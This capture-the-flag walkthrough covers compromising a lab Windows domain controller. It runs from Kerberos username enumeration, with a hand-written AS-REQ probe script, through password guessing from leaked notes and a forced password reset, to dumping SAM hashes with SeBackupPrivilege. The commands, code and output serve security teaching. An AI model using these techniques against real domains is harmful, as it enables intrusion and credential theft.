Welcome to Middle Camp, where we continue from part one (Base Camp). Using credentials found at Base Camp, we established a foothold in this new area. From there we brute-forced the password of another user, gaining more access. That account had the right to change the password of a member of the Backup Operators group, which gave us the permissions we needed to proceed. We then used SeBackupPrivilege to save the registry hives and collect password hashes. Finally, using these hashes, we escalated our privileges and obtained a shell as Administrator.
Nmap
As always, we start off with an Nmap scan:
```plaintext
nmap 10.10.173.62 -sC -sV -vv -Pn -oN k2.win.thm.nmap

PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-10-25 05:45:03Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2SERVER
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2Server.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-25T05:45:14+00:00
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Issuer: commonName=K2Server.k2.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-24T05:42:41
| Not valid after:  2025-04-25T05:42:41
| MD5:   47f7:dd59:133f:4091:dc3e:5207:06c6:b6aa
| SHA-1: 43ce:0aec:eb22:fccb:da6d:887a:5090:7be5:021d:00ab
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQUOZHDI70Qa5EcfFXKNY9rTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9LMlNlcnZlci5rMi50aG0wHhcNMjQxMDI0MDU0MjQxWhcNMjUw
| NDI1MDU0MjQxWjAaMRgwFgYDVQQDEw9LMlNlcnZlci5rMi50aG0wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDQ7b3P4KSx2CYlAArB5P6BE/rwq2MIrKfs
| RijfxyxrTuLRqmY3krWWUgaKGactgd6GPkxtkIS/y33KmN4vPbgNVIN7SgFFatrJ
| jRmfqLgg4nosDqL2uEnO6Kdr+Z8a1sb41CGvhqGucX6PVLFXlxkCJ0lFJTcR4Mj6
| cSgGji2KxHi9gwnw0J/0YsIQsak29jNyJcGeD3dPbN+HZKTO6v5vuM1zPWbAzFYd
| CDPVoikFCDuyMD98b2uo9SoMOUYXbHtDPx+y4QGqU8yXM5QAPDrLqWQXvBhrSlhK
| 0C+vMVKHXe+trXP4xa/Lb2MVkJvmsaQgyvGCIVX0UgFio3L67sMpAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAxg1C/DjmL/ZZWkM4+tWaoIlBzEjC3xS8G1dHRjBpBYT+tcyjJZd8mLJr
| fBJH8CwIpkbNnsYafFzjZB6jgqam1trMD0UeqLySHlfLmA+BdRqfLaycibB6fMVQ
| FmO84ojLvTS88LQlHiLcSw6KnY2XJCAlkAbGJ02cKvIIfCVJRxXkzbENXF0sV2Mb
| 0U0maJbE9fe3Ta1QRL5pQ9EBGzPoesCFL7uEHa3r4X8QVhgrRrm4Si76Roduxom2
| jWGbcSmy6T2uyOIlQLpQaNHT48AuRqstCZiQbmtlLYxYhWKt/YSw3vaethU39igQ
| 2kFUoFIV5eduiaSzWkRtqJ0b/tvxvA==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-10-25T05:45:53+00:00; 0s from scanner time.
Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
```
The combination of open ports (DNS on 53, Kerberos on 88, kpasswd on 464, LDAP/LDAPS on 389/636 and the global catalog on 3268/3269) tells us we are dealing with a Domain Controller.
From the scan we also obtain the hostname K2SERVER (FQDN K2Server.k2.thm), the domain name k2.thm, and the OS build 10.0.17763 (Windows Server 2019).
Getting a foothold
The task requires us to use all the information gathered earlier. From the previous part we have two full names, Rose Bud and James Bold, so we generate a list of candidate usernames in the usual corporate formats (first initial plus surname, first.last, and so on) with username-anarchy.
Testing those candidates against the KDC leaves us with two valid usernames, r.bud and j.bold.
How this works: a TGT request is made through an AS-REQ message. When the username does not exist, the KDC responds with a KRB-ERROR carrying the error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN. When the username is valid, either a TGT is returned in an AS-REP (if the account does not require pre-authentication) or the KDC raises KRB5KDC_ERR_PREAUTH_REQUIRED, meaning the user must pre-authenticate. Either way the existence of the account is confirmed without supplying a password and without triggering a lockout.
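To make the two steps above concrete (candidate usernames from full names, and what the KDC's answer to an AS-REQ tells us), here is an added example that is not from the original write-up or from any of the tools it uses. It encodes a pre-authentication-less AS-REQ by hand in DER, classifies the reply by its KRB-ERROR code, and can send the request to a KDC over TCP/88. The username formats, the nonce, the hostnames in the comments and the constructed KRB-ERROR used for the offline check are assumptions for illustration.

```python
import socket
import struct

# ---- minimal DER encoder: just enough for an AS-REQ (RFC 4120, section 5.4.1) ----
def _der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):
    return bytes([tag]) + _der_len(len(body)) + body

def ctx(n, body):                     # [n] EXPLICIT context-specific tag
    return tlv(0xA0 | n, body)

def der_int(v):
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def der_gstr(s):                      # KerberosString is a GeneralString
    return tlv(0x1B, s.encode())

def principal(name_type, parts):      # PrincipalName ::= SEQUENCE { name-type [0], name-string [1] }
    names = tlv(0x30, b"".join(der_gstr(p) for p in parts))
    return tlv(0x30, ctx(0, der_int(name_type)) + ctx(1, names))

def build_as_req(realm, user, nonce=0x1234ABCD):
    """AS-REQ without pre-authentication data: the KDC's answer reveals whether `user` exists."""
    realm = realm.upper()
    body = tlv(0x30,
               ctx(0, tlv(0x03, b"\x00\x40\x80\x00\x00"))          # kdc-options: forwardable, renewable
               + ctx(1, principal(1, [user]))                       # cname, NT-PRINCIPAL
               + ctx(2, der_gstr(realm))
               + ctx(3, principal(2, ["krbtgt", realm]))            # sname, NT-SRV-INST
               + ctx(5, tlv(0x18, b"20370913024805Z"))              # till (GeneralizedTime)
               + ctx(7, der_int(nonce))
               + ctx(8, tlv(0x30, der_int(18) + der_int(17) + der_int(23))))  # etypes: AES256, AES128, RC4
    # AS-REQ ::= [APPLICATION 10] KDC-REQ { pvno [1] 5, msg-type [2] 10, req-body [4] }
    return tlv(0x6A, tlv(0x30, ctx(1, der_int(5)) + ctx(2, der_int(10)) + ctx(4, body)))

def _read_tlv(buf, pos=0):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                     # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

KDC_ERR_C_PRINCIPAL_UNKNOWN = 6       # no such user
KDC_ERR_CLIENT_REVOKED = 18           # user exists but is disabled / locked out
KDC_ERR_PREAUTH_REQUIRED = 25         # user exists, a password is needed next

def classify_reply(reply):
    """Turn the KDC's raw reply into a verdict on the username."""
    tag, body, _ = _read_tlv(reply)
    if tag == 0x6B:                   # AS-REP [APPLICATION 11]: TGT issued without pre-auth
        return "valid (no pre-auth required, AS-REP roastable)"
    if tag != 0x7E:                   # KRB-ERROR is [APPLICATION 30]
        return "unexpected reply"
    _, seq, _ = _read_tlv(body)
    code, pos = None, 0
    while pos < len(seq):
        t, v, pos = _read_tlv(seq, pos)
        if t == 0xA6:                 # error-code [6] INTEGER
            code = int.from_bytes(_read_tlv(v)[1], "big", signed=True)
    return {KDC_ERR_C_PRINCIPAL_UNKNOWN: "invalid",
            KDC_ERR_PREAUTH_REQUIRED: "valid",
            KDC_ERR_CLIENT_REVOKED: "valid (disabled or locked out)"}.get(code, f"unknown error {code}")

def probe_user(kdc, realm, user, timeout=3.0):
    """Send one AS-REQ over TCP/88 (4-byte length prefix) and classify the answer."""
    req = build_as_req(realm, user)
    with socket.create_connection((kdc, 88), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        (n,) = struct.unpack(">I", s.recv(4))
        data = b""
        while len(data) < n:
            chunk = s.recv(n - len(data))
            if not chunk:
                break
            data += chunk
    return classify_reply(data)

def username_candidates(full_name):
    """username-anarchy-style formats for one full name (assumed set of formats)."""
    first, last = full_name.lower().split()
    return sorted({f"{first[0]}.{last}", f"{first[0]}{last}", f"{first}.{last}", f"{first}{last}",
                   f"{first}.{last[0]}", f"{first}{last[0]}", f"{last}.{first[0]}", f"{last}{first[0]}",
                   first, last})

def fake_krb_error(code):
    """Constructed KRB-ERROR (pvno, msg-type, error-code only) for offline checks of classify_reply."""
    return tlv(0x7E, tlv(0x30, ctx(0, der_int(5)) + ctx(1, der_int(30)) + ctx(6, der_int(code))))

if __name__ == "__main__":
    for name in ("Rose Bud", "James Bold"):
        print(name, "->", username_candidates(name))
    print(classify_reply(fake_krb_error(KDC_ERR_C_PRINCIPAL_UNKNOWN)))   # invalid
    # Against a live KDC: probe_user("K2Server.k2.thm", "k2.thm", "j.bold")
```

The request carries no PA-DATA on purpose: that is what makes the KDC answer with PREAUTH_REQUIRED for real accounts, and an account that instead gets a full AS-REP has pre-authentication disabled and its reply can be taken offline for cracking.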
Now that we know the valid usernames, we can test the passwords found at Base Camp against them using netexec.
I test all the passwords we found at Base Camp against j.bold.
The note that was sent to James reads:

```plaintext
Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.

At the very least adhere to the new password policy:
1. Length of password must be in between 6-12 characters
2. Must include at least 1 special character
3. Must include at least 1 number between the range of 0-999
```
```bash
*Evil-WinRM* PS C:\Users\r.bud\Documents> cat notes.txt
Done:
1. Note was sent and James has already performed the required action. They have informed me that they kept the base password the same, they just added two more characters to meet the criteria. It is easier for James to remember it that way.
2. James's password meets the criteria.

Pending:
1. Give James Remote Access.
```
From these notes we learn that James's password is "rockyou" plus two more characters. Given the policy, those two characters must be one special character and one digit (a 9-character password, inside the 6-12 limit), so the search space is small.
I asked ChatGPT to create a Python script that adds those two characters (one special character and one digit from 0-9) to "rockyou" in every position. Running the script prints all possible candidate passwords; redirect the output to a file to use it as a wordlist.
```python
import string


def generate_passwords():
    # The fixed base word from the note, plus the two characters the policy demands
    base_word = "rockyou"
    special_characters = "!@#$%^&*()-_=+[]{}|;:,.<>?/~`"
    numbers = string.digits

    passwords = []

    # Generate passwords by appending or prepending a digit and a special character
    for number in numbers:
        for special_char in special_characters:
            # Four placements: both characters before or after the base word, in either order
            passwords.append(f"{number}{special_char}{base_word}")
            passwords.append(f"{special_char}{number}{base_word}")
            passwords.append(f"{base_word}{number}{special_char}")
            passwords.append(f"{base_word}{special_char}{number}")

    return passwords


# Generate and print all possible passwords
all_passwords = generate_passwords()
for password in all_passwords:
    print(password)
```
I always like to mark every user that I can access as Owned.
Checking the BloodHound data, we can see that j.bold, through the IT Staff group, has GenericAll over j.smith.
To get information on how to exploit this, right-click the edge between the IT Staff group and j.smith.
GenericAll can be abused in several ways (for example a targeted Kerberoast or adding a shadow credential); I chose Force Change Password, which is the noisiest option but the simplest.
Let’s change the password of ‘j.smith’.
```bash
net rpc password "j.smith" "Password123@" -U "k2.thm"/"j.bold"%"[REDACTED]" -S K2Server.k2.thm
```
Now we can get a shell as j.smith using evil-winrm and read the user flag at C:\Users\j.smith\Desktop\user.txt.
SeBackupPrivilege
After enumerating j.smith's groups and privileges with whoami /all, we find that SeBackupPrivilege is enabled, because j.smith is a member of BUILTIN\Backup Operators. This privilege lets its holder read any file on the system regardless of its ACL, since backup reads bypass the normal access check; SeRestorePrivilege (also present) is the write-side equivalent.
```plaintext
User Name  SID
========== ============================================
k2\j.smith S-1-5-21-1966530601-3185510712-10604624-1115

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ===============================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
K2\IT Staff 1                              Alias            S-1-5-21-1966530601-3185510712-10604624-1116 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```
According to this article, we can dump the NTLM hashes from the SAM database with this privilege.
First we create a Temp directory in C:\, then use reg save (which honours SeBackupPrivilege) to export the SAM hive to it. We export the SYSTEM hive the same way, because it holds the boot key that the SAM hashes are encrypted with; without it the SAM alone cannot be decrypted.
```powershell
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
```
Then download both files from C:\Temp with evil-winrm's built-in download command:

```powershell
cd Temp
download sam
download system
```
Now we can dump the hashes offline with impacket's secretsdump in LOCAL mode. Note that on a domain controller the SAM holds only the local accounts (its RID 500 entry is the Directory Services Restore Mode administrator); the domain accounts live in NTDS.dit, which the same privilege could also be used to copy. In this case the Administrator hash recovered from the SAM is what gets us the final shell.
```bash
impacket-secretsdump -sam sam -system system local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9[REDACTED]32f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```